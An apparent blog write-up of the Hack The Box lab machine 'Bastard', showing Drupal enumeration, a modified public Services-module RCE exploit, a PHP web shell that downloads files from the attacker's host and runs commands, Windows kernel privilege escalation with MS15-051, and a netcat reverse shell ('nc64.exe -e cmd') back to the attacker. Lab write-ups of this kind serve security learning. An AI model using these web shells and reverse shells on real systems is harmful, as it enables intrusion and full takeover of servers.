18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Bastard

Starting of with a port scan.

root@n0w4n:~/opt/htb/bastard# nmap -n -T4 -sS -sV -sC -oA nmap.bastard 10.10.10.9
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 21:30 CEST
Nmap scan report for 10.10.10.9
Host is up (0.023s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds

Looks like a a drupal site and a fully stuffed robots.txt file. Also some RPC on a ephemeral port.

It runs probably on a windows server 2008 R2.
Let’s start with a scan of drupal.

root@n0w4n:~/opt/htb/bastard# python3 /root/opt/tools/dirsearch/dirsearch.py -u http://10.10.10.9/ -e php,txt -x 403,404 --simple-report=bastard.dirsearch
 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, txt | Threads: 10 | Wordlist size: 6344
Error Log: /root/opt/tools/dirsearch/logs/errors-18-06-28_08-35-01.log
Target: http://10.10.10.9/
[08:35:04] Starting:
[08:35:15] 400 -  324B  - /%ff/
[08:35:21] 200 -    8KB - /%3f/
[08:35:29] 200 -    7KB - /0
[08:55:12] 200 -  108KB - /CHANGELOG.txt
[08:55:12] 200 -  108KB - /ChangeLog.txt
[08:55:12] 200 -  108KB - /Changelog.txt
[08:55:12] 200 -  108KB - /changelog.txt
[08:55:12] 200 -  108KB - /CHANGELOG.TXT
[09:06:59] 301 -  150B  - /includes  ->  http://10.10.10.9/includes/
[09:07:18] 200 -    7KB - /index.php
[09:07:29] 200 -    7KB - /INDEX.PHP
[09:07:29] 200 -    7KB - /index.PHP
[09:08:00] 200 -    2KB - /INSTALL.mysql.txt
[09:08:00] 200 -    2KB - /install.mysql.txt
[09:08:00] 200 -    2KB - /INSTALL.pgsql.txt
[09:08:00] 200 -    2KB - /install.pgsql.txt
[09:08:02] 200 -   18KB - /INSTALL.txt
[09:08:02] 200 -   18KB - /Install.txt
[09:08:02] 200 -   18KB - /install.txt
[09:08:02] 200 -   18KB - /INSTALL.TXT
[09:08:03] 200 -    3KB - /install.php
[09:10:01] 200 -   18KB - /LICENSE.txt
[09:10:01] 200 -   18KB - /License.txt
[09:10:01] 200 -   18KB - /license.txt
[09:12:11] 200 -    9KB - /MAINTAINERS.txt
[09:13:38] 301 -  146B  - /misc  ->  http://10.10.10.9/misc/
[09:13:58] 301 -  149B  - /modules  ->  http://10.10.10.9/modules/
[09:15:29] 200 -    7KB - /node
[09:20:59] 301 -  150B  - /profiles  ->  http://10.10.10.9/profiles/
[09:21:48] 200 -    5KB - /README.txt
[09:21:48] 200 -    5KB - /Readme.txt
[09:21:48] 200 -    5KB - /readme.txt
[09:22:21] 200 -   62B  - /rest/
[09:22:27] 200 -    2KB - /robots.txt
[09:22:57] 301 -  149B  - /scripts  ->  http://10.10.10.9/scripts/
[09:22:57] 301 -  149B  - /Scripts  ->  http://10.10.10.9/Scripts/
[09:25:22] 301 -  147B  - /sites  ->  http://10.10.10.9/sites/
[09:29:40] 301 -  148B  - /themes  ->  http://10.10.10.9/themes/
[09:30:56] 200 -   10KB - /UPGRADE.txt
[09:31:29] 200 -    7KB - /user
[09:31:31] 200 -    7KB - /user/
[09:31:34] 200 -    7KB - /user/login/
[09:34:30] 200 -   42B  - /xmlrpc.php
Task Completed
root@n0w4n:~/opt/htb/bastard# droopescan scan drupal -u http://10.10.10.9/ -t 8
[+] Plugins found:
    ctools http://10.10.10.9/sites/all/modules/ctools/
        http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
        http://10.10.10.9/sites/all/modules/ctools/changelog.txt
        http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
        http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
        http://10.10.10.9/sites/all/modules/ctools/API.txt
    libraries http://10.10.10.9/sites/all/modules/libraries/
        http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
        http://10.10.10.9/sites/all/modules/libraries/changelog.txt
        http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
        http://10.10.10.9/sites/all/modules/libraries/README.txt
        http://10.10.10.9/sites/all/modules/libraries/readme.txt
        http://10.10.10.9/sites/all/modules/libraries/README.TXT
        http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
    services http://10.10.10.9/sites/all/modules/services/
        http://10.10.10.9/sites/all/modules/services/README.txt
        http://10.10.10.9/sites/all/modules/services/readme.txt
        http://10.10.10.9/sites/all/modules/services/README.TXT
        http://10.10.10.9/sites/all/modules/services/LICENSE.txt
    image http://10.10.10.9/modules/image/
    profile http://10.10.10.9/modules/profile/
    php http://10.10.10.9/modules/php/
[+] Themes found:
    seven http://10.10.10.9/themes/seven/
    garland http://10.10.10.9/themes/garland/
[+] Possible version(s):
    7.54
[+] Possible interesting urls found:
    Default changelog file - http://10.10.10.9/CHANGELOG.txt
    Default admin - http://10.10.10.9/user/login
[+] Scan finished (0:44:25.844837 elapsed)

The version of Drupal is 7.54 so let’s check searchsploit for possible exploits.

root@n0w4n:~/opt/htb/bastard# searchsploit drupal 7
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                                                                               | exploits/php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                                                                             | exploits/php/webapps/27020.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                                                                                         | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                                                                                          | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                                                                               | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                                                                               | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                                                                                  | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                                                                                    | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                                                                                        | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                                                                                   | exploits/php/webapps/3313.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                                                                             | exploits/php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                                                                                         | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit)                                                                                                    | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC)                                                                                                 | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                       | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                                                                                    | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                                                                             | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                                                                                   | exploits/php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                                                                                            | exploits/php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities                                                              | exploits/php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                                                                         | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                                                                         | exploits/php/webapps/44501.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

No direct exploit for version 7.54 but several for either 7.x or 7.58 and higher. The higher ones are with ruby scripts and the 7.x with a php script. Lets go for that one first.

$url = 'http://vmweb.lan/drupal-7.54';

After looking inside the script it looks like this exploit was written for version 7.54 after all (but probably can work with different versions 7).
I’ll change the url and the payload (just because I prefer a reverse shell). For this one I use the pentestmonkey reverse php script and modify it a bit to work with windows.
Then I’ll adjust the php script.

$fileRead = fopen("n0w4n.txt", "r") or die("No such file!");
$shell = fread($fileRead,filesize("n0w4n.txt"));
$url = '10.10.10.9';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';
$file = [
 ‘filename’ => 'n0w4n.php',
 ‘data’ => $shell
];

When running the script I get a lot off errors:

PHP Parse error:  syntax error, unexpected 'error_reporting' (T_STRING) in /root/opt/htb/bastard/41564.php on line 24
PHP Parse error: syntax error, unexpected 'us' (T_STRING), expecting function (T_FUNCTION) or const (T_CONST) in /root/opt/htb/bastard/41564.php on line 70

After looking at the script again it looks like there a numerous break-lines at some comments which will give these errors.

PHP Fatal error:  Uncaught Error: Call to undefined function curl_init() in /root/opt/htb/bastard/41564.php:254
Stack trace:
#0 /root/opt/htb/bastard/41564.php(104): Browser->post('application/vnd...', 'a:2:{s:8:"usern...')
#1 {main}
  thrown in /root/opt/htb/bastard/41564.php on line 254

Again…an error. This time it’s because I don’t have php-curl installed.

# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Failed to login with fake password

After installing the correct package the php script runs but stops at a password fail. But why? Normally when you execute php in your browser you can intercept it with a proxy like burp.
But now I want to intercept the traffic that is been generated from the cli. For that I’m going to create a proxy and run everything through it. For this I use burp.


With these settings Burp is set up to intercept all traffic that is run through the tunnel. Now to change the url inside the php script so it runs everything through Burp.

POST /rest_endpoint/user/login HTTP/1.1
Host: 127.0.0.1:9999
Accept: application/json
Content-Type: application/vnd.php.serialized
Content-Length: 885
Connection: close

When looking at the header I see that the uri is different then from the dirsearch scan in the beginning. It’s not ‘rest_endpoint’, but just ‘rest’. Adjusting the script and changing back the IP address.

root@n0w4n:~/opt/htb/bastard# php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/n0w4n.php

Looks like the script ran just fine now.

root@n0w4n:~/opt/privesc/shells/php# nc -lvnp 31337
listening on [any] 31337 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.9] 58877
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\>

Even with the adjustments, it looks like the shell is just not working properly. It runs the cmd command, but there is no response from any command. Let’s try that again with another command: systeminfo:

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          25/6/2018, 4:31:57 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
                           [02]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.048 MB
Available Physical Memory: 1.566 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.599 MB
Virtual Memory: In Use:    496 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9
iis apppool\drupal

I got systeminfo and whoami, but again no further interaction. The shell just freezes up. I can repeat the same process over and over again to get the flag, but that’s really gonna work on my nerves. So I need to find another way in.
Because I’ve tried it with different msfvenom payloads as well as other php payloads from the internet and getting the same result…..I looked up some other ways to exploit the vulnerability and one way was given by IppSec.

$phpCode = <<<'EOD'
<?php
	if (isset($_REQUEST['fupload'])) {
  		file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.2:8000/" . $_REQUEST['fupload']));
	};
	if (isset($_REQUEST['fexec'])) {
  		echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
	};
?>
EOD;

This piece of php is added to the php exploit script and will give 2 parameters which will have an upload function and a browse function on the remote machine.

 Directory of C:\inetpub\drupal-7.54
28/06/2018  12:42 ££    <DIR>          .
28/06/2018  12:42 ££    <DIR>          ..
19/03/2017  01:42 ££               317 .editorconfig
19/03/2017  01:42 ££               174 .gitignore
19/03/2017  01:42 ££             5.969 .htaccess
19/03/2017  01:42 ££             6.604 authorize.php
19/03/2017  01:42 ££           110.781 CHANGELOG.txt
19/03/2017  01:42 ££             1.481 COPYRIGHT.txt
19/03/2017  01:42 ££               720 cron.php
19/03/2017  01:43 ££    <DIR>          includes
19/03/2017  01:42 ££               529 index.php
19/03/2017  01:42 ££             1.717 INSTALL.mysql.txt
19/03/2017  01:42 ££             1.874 INSTALL.pgsql.txt
19/03/2017  01:42 ££               703 install.php
19/03/2017  01:42 ££             1.298 INSTALL.sqlite.txt
19/03/2017  01:42 ££            17.995 INSTALL.txt
19/03/2017  01:42 ££            18.092 LICENSE.txt
19/03/2017  01:42 ££             8.710 MAINTAINERS.txt
19/03/2017  01:43 ££    <DIR>          misc
19/03/2017  01:43 ££    <DIR>          modules
29/06/2018  10:45 §£               291 n0w4n.php
19/03/2017  01:43 ££    <DIR>          profiles
19/03/2017  01:42 ££             5.382 README.txt
19/03/2017  01:42 ££             2.189 robots.txt
19/03/2017  01:43 ££    <DIR>          scripts
28/06/2018  12:26 ££                48 shell.php
19/03/2017  01:43 ££    <DIR>          sites
19/03/2017  01:43 ££    <DIR>          themes
19/03/2017  01:42 ££            19.986 update.php
19/03/2017  01:42 ££            10.123 UPGRADE.txt
19/03/2017  01:42 ££             2.200 web.config
19/03/2017  01:42 ££               417 xmlrpc.php
              23 File(s)        217.600 bytes
               9 Dir(s)  30.802.579.456 bytes free

And it works. Nice. Let’s see if this way is more stable.
So atm I have a stable way of enumerating this machine, but unfortunately I still have a low privileged account. Let’s grab the systeminfo and run it through windows-exploit-suggester.

root@n0w4n:~/opt/htb/bastard# python windows-exploit-suggester.py -d 2018-06-30-mssb.xls -i systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Some possible exploits. When searching the internet for some useful scripts, there is a site which lists scripts you can use for windows kernel exploits and there is one I didn’t know.
A powershell script called Sherlock from rasta-mouse. So let’s try that one also.

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Not Vulnerable
Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
             tml
VulnStatus : Not Vulnerable

This script looks for newer vulnerabilities and it looks like there a three possibilities. The MS10-092, MS15-051 and MS16-032 are possibly vulnerable. The first one exploits the Task Scheduler 2.0 XML 0day which was exploited by Stuxnet. The third one uses a race condition which can be a hassle. And the second one exploits improper object handling in the win32k.sys kernel mode driver. This one has been tested on vulnerable builds of Windows 7 x64 and x86, AND Windows 2008 R2 SP1 x64. So I’ll go for this last one because I know the build of this machine matches this exploit perfectly.

root@n0w4n:~/opt/htb/bastard# cp /root/opt/privesc/Windows/windows-kernel-exploits/MS15-051/MS15-051-KB3045171/ms15-051x64.exe .
10.10.10.9/n0w4n.php?fupload=ms15-051x64.exe

After upload I run the file.

C:\inetpub\drupal-7.54>ms15-051x64.exe whoami
ms15-051x64.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1748 created.
==============================
nt authority\system

Now to get the flags.

C:\inetpub\drupal-7.54>ms15-051x64.exe "C:\inetpub\drupal-7.54\nc64.exe -e cmd 10.10.14.2 6666"
ms15-051x64.exe "C:\inetpub\drupal-7.54\nc64.exe -e cmd 10.10.14.2 6666"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1456 created.
==============================
root@n0w4n:~/opt/htb/bastard# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.9] 49192
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system
C:\Users\dimitris\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA
 Directory of C:\Users\dimitris\Desktop
19/03/2017  09:04 ��    <DIR>          .
19/03/2017  09:04 ��    <DIR>          ..
19/03/2017  09:06 ��                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.817.583.104 bytes free
C:\Users\dimitris\Desktop>type user.txt
type user.txt
ba22fde1932d06eb76a163d312f921a2

That’s one.

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA
 Directory of C:\Users\Administrator\Desktop
19/03/2017  08:33 ��    <DIR>          .
19/03/2017  08:33 ��    <DIR>          ..
19/03/2017  08:34 ��                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.817.583.104 bytes free
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
4bf12b963da1b30cc93496f617f7ba7c

And that’s two.
 
 
 
 
 
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.